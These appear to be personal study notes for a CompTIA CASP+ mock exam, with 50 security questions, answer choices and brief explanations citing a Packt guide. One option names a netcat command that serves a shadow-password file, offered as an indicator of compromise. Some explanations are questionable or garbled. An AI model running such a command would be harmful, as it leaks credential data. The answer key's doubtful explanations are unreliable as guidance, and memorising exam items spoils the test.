CASP Mark B Mock 1

Question 1

Developers are building a sensitive references and account details into the application code. Security engineers needs to ensure that the organization can secure the continuous integration/continuous deliver pipeline. What would be the best choice?

A. Perform dynamic application security testing
B. Use a centralized trusted secrets manager service
C. Use interactive application security testing
D. Ensure the developers are using version control

Answer 1

B. Use a centralized trusted secrets manager service

Explanation:
Use a centralized trusted secrets manager service. Secrets can include user or auto generated passwords, APIs, and other application keys/credentials, SSH keys, databases and other system to system passwords. You should use private certificates for more secure communication and private encryption keys

Question 2

What type of assessment should be performed by an organization that stores, transmits or processes data that contains private information?

A. Business Impact Assessment
B. Privacy Impact Assessment
C. Risk Assessment
D. Safety Assessment

Answer 2

B. Privacy Impact Assessment

Explanation:
Privacy Impact Assessment. A PIA should be undertaken by any organization that stores, transmits or processes data that contains private information. Data types will vary but can include documents, database records and media such as CCTV footage and voice recordings

Question 3

The ACME corporation has recently run an annual risk assessment as part of its regulatory compliance. The risk management team has identified a high level risk that could lead to fraudulent activities. The team has recommended that certain privileged tasks must be performed by more than one person for the task to be validated. What is this an example of?

A. Job rotation
B. Least privilege
C. Separation of duties
D. MFA

Answer 3

C. Separation of duties

Explanation:
Separation of duties. When an employee has privileges that enable them to make high-level decisions without needing the consent of another employee, then we are missing essential checks and balances. Consider a Chief Financial Officer (CFO), who approves new suppliers, approves the suppliers’ invoices for services, and signs their paychecks. This example would allow for fraudulent activities and would be mitigated by establishing accounts receivable and accounts payable business functions. See Chapter 13, Applying Appropriate Risk Strategies.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 820). Packt Publishing. Kindle Edition.

Question 4

No

Question 5

An e-commerce site has recently upgraded its web application servers to use TLS 1.3, though some customers are calling the service desk as they can no longer access the services. After analyzing the logs that had been generated on the client’s devices, the following was observed: ERROR_SSL_VERSION_OR_CIPHER_MISMATCH

What is the most likely cause of the reported error?

A. Clients are configured to use ECDHE.
B. Clients are configured to use RC4.
C. Clients are configured to use PFS.
D. Clients are configured to use AES-256 GCM.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 798-799). Packt Publishing. Kindle Edition.

Answer 5

B. Clients are configured to use RC4.

Explanation:
Clients are configured to use RC4. RC4 is considered weak encryption and would not be supported while using TLS 1.3

Question 6

The security professionals are reviewing all the servers in the company and discover that a server is missing crucial patches that would mitigate a recent exploit that could gain root access. Which of the following describes the teams’ discovery?

A. A vulnerability
B. A threat
C. A breach
D. A risk

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 799). Packt Publishing. Kindle Edition.

Answer 6

A. A vulnerability

Explanation:
A vulnerability. When a system is missing patches, it is vulnerable to attacks. During a risk assessment, we need to assess vulnerabilities and potential threats that could target the vulnerability. See Chapter 6, Vulnerability Assessment and Penetration Testing Methods and Tools.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 820-821). Packt Publishing. Kindle Edition.

Question 7

ACME bank has a compliance requirement. They require a third-party penetration test of the customer-facing banking application to be conducted annually. What type of penetration testing would ensure the lowest resource usage?

A. Black-box testing
B. Gray-box testing
C. Red-team exercises
D. White-box testing

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 799). Packt Publishing. Kindle Edition.

Answer 7

A. Black-box testing

Explanation:
Black box testing will take the least amount of time but may noit discover all vulnerabilities

Question 8

Recently, the ACME corporation has merged with a similar sized organization. The SOC Staff now have an increased workload and are failing to respond to all alerts. What is likely the cause of this behavior?

A. False positive
B. Alert fatigue
C. False negative
D. True positive

Answer 8

B. Alert fatigue

Explanation:
Alert fatigue. This is when the staff are overwhelmed with too many alerts.

Question 9

A small regional bank, with no dedicated security, must deploy security at the edge of the network. They will need a solution that will offer protection from multiple threats that may target the banks network. What would be the best solution for this?

A. Router
B. WAF
C. UTM
D. DLP

Answer 9

C. UTM

Explanation:
Unified Threat Management combines multiple security functions into a single appliance

Question 10

During baseline security training for new developers, attention must be focused on the use of third party libraries. What is the important aspect for a commercial development team that’s considering the use of third party libraries?

A. Third party libraries may have vulnerabilities.
B. Third party libraries may be incompatible
C. Third party libraries may not support DNSSEC
D. Third party libraries may have licensing restrictions

Answer 10

A. Third party libraries may have vulnerabilities.
D. Third party libraries may have licensing restrictions

Explanation:
Third party libraries may have vulnerabilities and third party libraries may have licensing restrictions

Question 11

A CISO wants to change the culture of the organization to strengthen the companys security posture. The initiative will bring the development and operations team together when code is released to the production environment. What is the best description of this initiative?

A. DevOps
B. A team building exercise
C. A tabletop exercise
D. SecDevOps

Answer 11

D. SecDevOps

Explanation:
The development team and operations team work together to ensure code is delivered error free

Question 12

A development team is working with a customer to develop a mobile application. The customer has already defined all the requirements upfront and wants the application to be developed using very strict timelines. It is not anticipated that any changes will be made to the initial definition. What software development approach would be the most suitable for this engagement?

A. Agile
B. Waterfall
C. Spiral
D. Build and Fix

Answer 12

B. Waterfall

Explanation: The waterfall methodology means that we must have defined all the requirements at the start of the process and that no changes will be made during the development cycle

Question 13

A CISO for a large multinational bank would like to address security concerns regarding the use and auditing of local administrator credentials on end devices. Currently, users are given local administrator privileges when access is required. This current practice has resulted in undocumented changes, a lack of accountability, and account lockouts. What could be implemented to address these issues?

A. Use Privileged Access Management (PAM) to maintain user accounts in the local admin group.
B. Deploy EDR to remove users from local admins group and enable audit logs.
C. Use Privileged Access Management (PAM) to remove user accounts from the local admin group and prompt the user for explicit approval when elevation is required.
D. Deploy EDR to remove users from the local admins group and enable UEBA.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 801-802). Packt Publishing. Kindle Edition.

Answer 13

C. Use Privileged Access Management (PAM) to remove user accounts from the local admin group and prompt the user for explicit approval when elevation is required.

Explanation:
Use Privileged Access Management (PAM) to remove user accounts from the local admin group and prompt the user for explicit approval when elevation is required. This solution allows accounts to elevate their privileges and that these actions will be audited

Question 14

The ACME corporation has been suffering from increasing numbers of service outages on the endpoints due to ever-increasing instances of new malware. The Chief Financial Officer’s laptop was impacted while working remotely from a hotel. The objective is to prevent further instances of endpoint disruption. Currently, the company has deployed a web proxy at the edge of the network. What should the company deploy to mitigate these threats?

A. Replace the current antivirus with an EDR solution.
B. Remove the web proxy and install a UTM appliance.
C. Implement application blacklisting on the endpoints.
D. Add a firewall module to the current antivirus solution.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 802). Packt Publishing. Kindle Edition.

Answer 14

A. Replace the current antivirus with an EDR solution.

Explanation:
Replace the current antivirus with an EDR solution. The end devices must be protected when they are not on the company network. The other solutions will not adequately fulfill the requirements

Question 15

A company has been testing its Disaster Recovery Plan (DRP) while team members have been assessing challenges that had been encountered while testing in parallel. Computing resources ran out at 65% of the restoration process for critical services. What documentation should be modified to address this issue?

A. Recovery point objective
B. Business Impact Assessment
C. Mission-essential functions
D. Recovery service level

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 802-803). Packt Publishing. Kindle Edition.

Answer 15

D. Recovery service level

Explanation:
Recovery Service Level

Question 16

A security professional is performing a system penetration test. They successfully gain access to a shell on a Linux host as a standard user and want to elevate their privilege levels. What would be the most effective way to perform privilege escalation?

A. Spawn a shell using sudo and use a text editor to update the sudoer’s file.
B. Perform ASIC password cracking on the host.
C. Access the /etc/passwd file to extract the usernames.
D. Use the UNION operator to extract the database schema.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 803). Packt Publishing. Kindle Edition.

Answer 16

C. Access the /etc/passwd file to extract the usernames.

Explanation:
Access the /etc/passwd file to extract the usernames. As the account is a standard user, they will not have the right to edit configuration files (sudoers), so the best option is to access the passwd file

Question 17

No

Question 18

A CISO needs to ensure there is an effective incident response plan. As part of the plan, a CSIRT team needs to be identified, including leadership with a clear reporting and escalation process. At what part of the incident response process should this be done?

A. Preparation
B. Detection
C. Analysis
D. Containment

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 804). Packt Publishing. Kindle Edition.

Answer 18

A. Preparation

Explanation:
Preparation

Question 19

The ACME corporation’s CSIRT team responded to an incident where several routers failed at the same time. The cause of the failure is unknown, and the routers have been reconfigured and restored to operational condition. The integrity of the router’s configuration has also been verified. Which of the following should the team perform to understand the failure and prevent it in the future?

A. Root cause analysis
B. Continuity of operations plan
C. After-action report
D. Lessons learned

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 804-805). Packt Publishing. Kindle Edition.

Answer 19

A. Root cause analysis

Explanation:
This would be performed as a result of lessons learned/AAR

Question 20

Jeff, a developer with the ACME corporation, is concerned about the impact of new malware on an ARM CPU. He knows that the malware can insert itself in another process memory location. Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?

A. Execute-never (XN)
B. EDR software
C. Total memory encryption
D. Virtual memory encryption

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 805). Packt Publishing. Kindle Edition.

Answer 20

A. Execute-never (XN)

Explanation:
CPU chips support memory protection within the hardware

Question 21

Security professionals have detected anomalous activity on the edge network. To investigate the activity further, they intend to examine the contents of the pcap file. They are looking for evidence of data exfiltration from a suspect host computer. To minimize disruption, they need to identify a command-line tool that will provide this functionality. What should they use?

A. netcat
B. tcpdump
C. Aircrack-ng
D. Wireshark

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 805-806). Packt Publishing. Kindle Edition.

Answer 21

B. tcpdumption:

Explanation:
this is a command line protocol analyzer thats capable of capturing traffic and can be sued to analyze previous captures. pcap is a standard packet capture file format.

Question 22

Ann, a security analyst, is investigating anomalous activity within syslog files. She is looking for evidence of unusual activity based on reports from User Entity Behavior Analytics (UEBA). Several events may be indicators of compromise. Which of the following requires further investigation?

A. Netstat -bn
B. vmstat -a 5
C. nc -w 180 -p 12345 -l < shadow.txt
D. Exiftool companylogo.jpg

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 806). Packt Publishing. Kindle Edition.

Answer 22

C. nc -w 180 -p 12345 -l < shadow.txt

Explanation:
Netcat can be used to run remote commands on a target system, allowing for files to be transferred

Question 23

UEBA has generated alerts relating to significant amounts of PNG image uploads to a social networking site. The account that has generated the reports is a recent hire in the Research and Development division. A rival manufacturer is selling products that appear to be based on the company’s sensitive designs. The payloads are now being analyzed by forensics investigators. What tool will allow them to search for evidence in the PNG files?

A. Steganalysis tool
B. Cryptanalysis tool
C. Binary analysis tool
D. Memory analysis tool

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 806). Packt Publishing. Kindle Edition.

Answer 23

A. Steganalysis tool

Explanation:
This tool would search for data hidden within graphics file

Question 24

Marketing executives are attending an international trade exhibition and must connect to their company’s email using their mobile devices during the event. The CISO is concerned that this may present a risk. What would best mitigate this risk?

A. Near-field communication (NFC)
B. Split-tunnel
C. VPN Geofencing
D. Always-on VPN settings

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 807). Packt Publishing. Kindle Edition.

Answer 24

D. Always-on VPN settings

Explanation:
They will always have an encrypted connection thats routed through the company network

Question 25

A company employee has followed a QC link and installed a mobile application that’s used to book and schedule activities at a vacation resort. The application is not available on Google Play Store. Company policy states that applications can only be downloaded from the official vendor store or company portal. What best describes what has allowed this app to be installed?

A. Supply chain issues
B. Side loading
C. Containerization
D. Unauthorized application stores

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 807). Packt Publishing. Kindle Edition.

Answer 25

D. Unauthorized application stores

Explanation:
Unauthorized applications stores

Question 26

A company has deployed a hardened Linux image to mobile devices. The restrictions are as follows: All unnecessary services must be removed. Only company-deployed apps can be run. The runtime code is protected against memory exploits. The CISO is concerned that an attacker may be able to launch attacks using common utilities and command-line tools. What could be deployed to mitigate the CISO’s concerns?

A. Whitelisting
B. Shell restrictions
C. ASLR
D. Memory encryption

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 807-808). Packt Publishing. Kindle Edition.

Answer 26

B. Shell restrictions

Explanation:
The current settings mitigate the main threats but do not prevent built in commands from being ran

Question 27

A regional Internet Service Provider (ISP) is experiencing outages and poor service levels over some of its copper-based infrastructure. These faults are due to the reliance on legacy hardware and software. Several times during the month, a contracted company must follow a checklist of 12 different commands that must be run in serial to restore performance to an acceptable level. The ISP would like to make this an automated process. Which of the following techniques would be best suited for this requirement?

A. Deploy SOAR utilities and runbooks.
B. Replace the associated hardware.
C. Provide the contractors with direct access to syslog data.
D. Switch the copper-based infrastructure to fiber.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 808). Packt Publishing. Kindle Edition.

Answer 27

A. Deploy SOAR utilities and runbooks.

Explanation:
Deploy SOAR utilities and runbooks. This will automate this repetitive process and take some of the workload off the technicians

Question 28

A security analyst is investigating a possible buffer overflow attack. The attack seems to be attempting to load a program file. Analysis of the live memory reveals that the following string is being run: code.linux_access.prg Which of the following technologies would best mitigate the manipulation of memory segments?

A. NX bit
B. ASLR
C. DEP
D. HSM

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 808-809). Packt Publishing. Kindle Edition.

Answer 28

B. ASLR

Explanation:
This mitigation is built into the Operating System and is considered a better option (NX + DEP is hardware based and less effective)

Question 29

A CISO at a regional power supply company is performing a risk assessment. The CISO must consider what the most important security objective is when applying cryptography to control messages. The control messages are critical and enable the operational technology to ensure the generators are outputting the correct electrical power levels. What is the most important consideration here?

A. Importing the availability of messages
B. Ensuring the non-repudiation of messages
C. Enforcing protocol conformance for messages
D. Ensuring the integrity of messages

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 809). Packt Publishing. Kindle Edition.

Answer 29

D. Ensuring the integrity of messages

Explanation:
Ensuring the integrity of messages. Control messages will not normally be confidential but must be tamper-proof. This is the best solution

Question 30

Alan, a CISO for an online retailer, is performing a quantitative risk assessment. The assessment is based on the public-facing web application server. Current figures show that the application server experiences 80 attempted breaches per day. In the past 4 years, the company’s data has been breached two times. Which of the following represents the ARO for successful breaches?

A. 50
B. 0.8
C. 0.5
D. 29,200

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 809-810). Packt Publishing. Kindle Edition.

Answer 30

C. 0.5

Explanation:
ARO over 4 years is 0.5 as there were only two successful breaches.

Question 31

Security engineers are assessing the capabilities and vulnerabilities of a widely used mobile operating system. The company intends to deploy a secure image to mobile phones and tablets. The mobile devices mustn’t be vulnerable to the risk of privilege elevation and the misuse of applications. What would be the most beneficial to the company for addressing these concerns?

A. Security-Enhanced Linux (SELinux)
B. Trusted Platform Module (TPM)
C. Security-Enhanced Android (SEAndroid)
D. Attestation services

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 810). Packt Publishing. Kindle Edition.

Answer 31

C. Security-Enhanced Android (SEAndroid)

Explanation:
This is SELinux for mobile devices

Question 32

Gerry, a CISO for a national healthcare provider, is assessing proposals for network storage solutions. The proposal is for NAS to be deployed to all regional hospitals and clinics. As the data that will be stored will be sensitive and subject to strict regulatory compliance, security is the most important consideration. The proposal is for appliances running a Linux kernel and providing secure access to authenticated users through NFS. One major concern is ensuring that the root account cannot be used to gain access to user data on the Linux NFS appliances. What would best prevent this issue from occurring?

A. Ensure passwords are stored in a shadow file.
B. Run SELinux in enforced mode.
C. Disable central processing unit (CPU) virtualization support.
D. Enforce secure encrypted enclaves/memory encryption.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 810-811). Packt Publishing. Kindle Edition.

Answer 32

B. Run SELinux in enforced mode.

Explanation:
Run SELinux in enforced mode. This will enforce mandatory access control (MAC)

Question 33

ACME chemicals is conducting a risk assessment for its legacy operational technology. One of their major concerns is the widespread use of a standard message transport protocol that’s used in industrial environments. After performing a vulnerability assessment, several CVEs are discovered with high CVSS values. The findings describe the following vulnerabilities: CVE-2018-11452: Denial-of-service of the affected device CVE-2018-7842: Elevation of privilege by conducting a brute-force attack on the parameters that were sent to the controller CVE-2017-6034: An attacker can replay the run, stop, upload, and download commands Additional CVEs report multiple vulnerabilities, including no security against message integrity being tampered with and being vulnerable to MITM attacks. What is the network/protocol that has most likely been assessed?

A. Ethernet
B. Modbus
C. Distributed Network Protocol 3 (DNP3)
D. Zigbee

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 811-812). Packt Publishing. Kindle Edition.

Answer 33

B. Modbus

Explanation:
This is a well used control protocol that’s used within industrial controlled environments. It is vulnerable to many different threats

Question 34

NO

Question 35

A small water treatment plant is being controlled by a SCADA system. There are four main treatment tanks, each being serviced by an input pump and an output pump. The design of the plant offers redundancy as the plant can operate without all the tanks being available. The plant is comprised of a standard SCADA mix of operational technology, including PLCs and a supervisory computer. What system failure will cause the biggest outage?

A. Loss of a treatment tank
B. Loss of supervisory computer
C. Failure of an input pump
D. Failure of a PLC

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 813). Packt Publishing. Kindle Edition.

Answer 35

B. Loss of supervisory computer

Explanation:

Question 36

A development team is implementing a customer-facing API that uses a database backend. Before the deployment, the team is concerned about attacks, such as XSS, XSRF, and injection attacks. To mitigate these types of attacks, the team needs to identify security controls that could be implemented. Which of the following sources could the team consult to address these security concerns?

A. SDLC
B. OVAL
C. IEEE
D. OWASP

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 813). Packt Publishing. Kindle Edition.

Answer 36

D. OWASP

Explanation:
This will be the best source of reference when securing web applications

Question 37

The customers of a large online retailer are reporting high levels of latency when they are searching for products on the e-commerce site. The site consists of an array of load-balanced APIs that do not require authentication. The application servers that host the APIs are showing heavy CPU utilization. WAFs that have been placed in front of the APIs are not generating any alerts. Which of the following should a security engineer recommend to best remedy these performance issues promptly?

A. Implement rate limiting on the API.
B. Implement geo-blocking on the WAF.
C. Implement OAuth 2.0 on the API.
D. Implement input validation on the API.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 813-814). Packt Publishing. Kindle Edition.

Answer 37

A. Implement rate limiting on the API.

Explanation:
Implement rate limiting on the API. This will allow for the number of connections that are forwarded to the web servers to be throttled

Question 38

ACME bank engineers are configuring security for a new data center. They are looking to implement SSL/TLS for customer-facing application servers. Customers will connect to the bank API through a deployed mobile application. They must now choose a symmetric algorithm that offers the greatest speed and security. Which should they choose?

A. ChaCha256 + poly1305
B. 3DES + CBC
C. AES256 + CBC
D. Salsa256 + CBC

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 814). Packt Publishing. Kindle Edition.

Answer 38

A. ChaCha256 + poly1305

Explanation:
ChaCha256 + poly1305. This offers a major performance advantage over existing technologies.

Question 39

Hackers can gain access to encrypted data transmissions. After performing vulnerability assessments on the application servers, several cipher suites are available for backward compatibility. Which of the following would represent the greatest risk?

A. TLS_RSA_WITH_AES_128_CBC_SHA
B. TLS_RSA_WITH_RC4_40_MD5
C. TLS_DHE_RSA_WITH_AES_256_CBC_SHA
D. TLS_RSA_WITH_3DES_EDE_CBC_SHA

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 814-815). Packt Publishing. Kindle Edition.

Answer 39

B. TLS_RSA_WITH_RC4_40_MD5

Explanation:
TLS_RSA_WITH_RC4_40_MD5. RC4 (symmmetric encryption) should not be used and will cause systems to be out of compliance. MD5 (Hashing algorithm) is also weak and should not be used

Question 40

A company is deploying an online streaming service for customers. The content needs to be protected; only the paid subscribers should be able to view the streams. The company wants to choose the best solution for low latency and security. What would be the best choice?

A. 3DES
B. AES
C. ChaCha
D. RC4

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 815). Packt Publishing. Kindle Edition.

Answer 40

C. ChaCha

Explanation:
This is a stream cipher and will offer very good performance for streaming media

Question 41

A government agency is configuring a VPN connection between Fort Meade and a field office in New York. Of primary importance is having a highly secure key exchange protocol due to the threats posed by nation state threat actors. Which encryption protocol would be a good choice?

A. Advanced Encryption Standard (AES)
B. ECDHE p521
C. ChaCha-256
D. SHA-512

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 815). Packt Publishing. Kindle Edition.

Answer 41

B. ECDHE p521

Explanation:
This is currently the strongest form of key exchange. The other answers refer to symmetric encryption or hashing

Question 42

Software developers are deploying a new customer-facing CRM tool. The deployment will require the customers to download an application on their system. Customers must be able to verify that the application is trustworthy. What type of certificate will the software developers request to fulfill this requirement?

A. Client authentication
B. Server authentication
C. Digital signatures
D. Code signing

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 815-816). Packt Publishing. Kindle Edition.

Answer 42

D. Code signing

Explanation:
The application code needs to be digitially signed.

Question 43

A large insurance provider has grown in size and now supports customers in many different countries. Due to this increased footprint, they are looking to minimize administration by allocating a single certificate to multiple sites. The sites will be country-specific, with different domain names. What would be the best choice for delivering this requirement?

A. Wildcard certificate
B. Extended validation
C. General-purpose
D. Subject Alternate Name (SAN)

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 816). Packt Publishing. Kindle Edition.

Answer 43

D. Subject Alternate Name (SAN)

Explanation:
This will allow a single certificate to be issued for multiple sites. A wildcard would not be suitable as the domain names will be different.

Question 44

The CISO is delivering a security briefing to senior members of staff. One of the topics of conversation concerns the current e-commerce site. During a Q&A session, the CISO is asked questions about PKI and certificates. A rudimentary question is asked – what key is stored on a certificate?
What should the CISO answer?

A. Public key
B. Private key
C. Public and private keys
D. Signing key

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 816-817). Packt Publishing. Kindle Edition.

Answer 44

A. Public key

Explanation:
A digital certificate validates the public key. Private keys are not shared but can be stored in escrow if a copy needs to be made

Question 45

A large online bank would like to ensure that customers can quickly validate that the bank’s certificates are not part of a CRL. What would best meet this requirement?

A. Extended validation
B. Certificate pinning
C. OCSP
D. CRL

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 817). Packt Publishing. Kindle Edition.

Answer 45

C. OCSP

Explanation:
This allows a quick response to be provided when a CRL check is required

Question 46

Website engineers are configuring security extensions to be deployed to all customer-facing web application servers. What HTTP extension will ensure that all the connections to the application servers will also be encrypted using the assigned X.509 certificate?

A. HTTP X-FRAME headers
B. HTTP Strict Transport Security (HSTS)
C. HTTPS SSL 3.0 CBC
D. Extended validation

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 817). Packt Publishing. Kindle Edition.

Answer 46

B. HTTP Strict Transport Security (HSTS)

Explanation:
This will ensure that all the connections are forced to use HTTPS/TLS

Question 47

Nation state-sponsored actors have stolen the smartphone of a government official. They have attempted to guess the PIN code several times, eventually locking the device. They are attempting to gain access to the data using forensic tools and techniques but the data cannot be accessed. What has likely prevented a data breach from occurring?

A. Hardware write blocker
B. USB data blocker
C. Crypto shredding
D. Improper key handling

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 817-818). Packt Publishing. Kindle Edition.

Answer 47

C. Crypto shredding

Explanation:
The symmetric key that was used to encrypt the data is destroyed, making data reocvery ineffective

Question 48

A small startup energy company has built up a database of clients. It is estimated that this database is worth $100,000. During a data breach, a cyber-criminal (working for a competitor) steals 10% of the records. The company fails to put adequate controls in place and a second breach occurs within 12 months. What is the Annual Loss Expectancy (ALE)?

A. $200,000
B. $1,000
C. $20,000
D. $10,000

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 818). Packt Publishing. Kindle Edition.

Answer 48

C. $20,000

Explanation:

Question 49

A defense contractor currently loses an estimated $2,000,000 each year due to intellectual property theft. The company has a solid reputation for R&D and manufacturing but has no dedicated security staff. A Managed Security Service Provider (MSSP) guarantees that they will provide 90% protection for the data over a 5-year contract at an annual cost of $250,000 per annum. What is the ROI in dollars?

A. $10,000,000
B. $9,000,000
C. $750,000
D. $7,750,000

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 818-819). Packt Publishing. Kindle Edition.

Answer 49

D. $7,750,000

Explanation:
The contract is for 5 years, so the potential loss would be 10,000,000. As we mitigate 90% of the loss, we have saved 9,000,000 but must pay 5 x 250,000 = 1,250,000

Question 50

An automobile manufacturer suffers a power outage at one of its foundries. The facility supplies critical components for the company. The COOP designated the foundry as a mission-essential service, and it was agreed that the foundry must be operational within 24 hours. The energy supplier has struggled to repair severe storm-damaged cables. As a result, the facility is without power for 72 hours. What is the metric that describes this 72-hour outage?

A. Mean time to recovery (MTTR)
B. Mean time between failure (MTBF)
C. Recovery Time Objective (RTO)
D. Annualized rate of occurrence (ARO)

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 819). Packt Publishing. Kindle Edition.

Answer 50

A. Mean time to recovery (MTTR)

Explanation: